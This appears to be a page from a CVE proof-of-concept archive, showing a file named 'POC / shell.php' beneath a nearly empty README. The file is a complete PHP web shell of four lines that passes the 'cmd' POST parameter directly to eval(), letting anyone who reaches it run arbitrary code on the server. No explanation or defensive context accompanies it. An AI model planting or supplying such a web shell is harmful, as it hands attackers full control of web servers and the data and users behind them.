4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / shell.php PHP
<?php
$cmd=$_POST['cmd'];
eval($cmd);
?>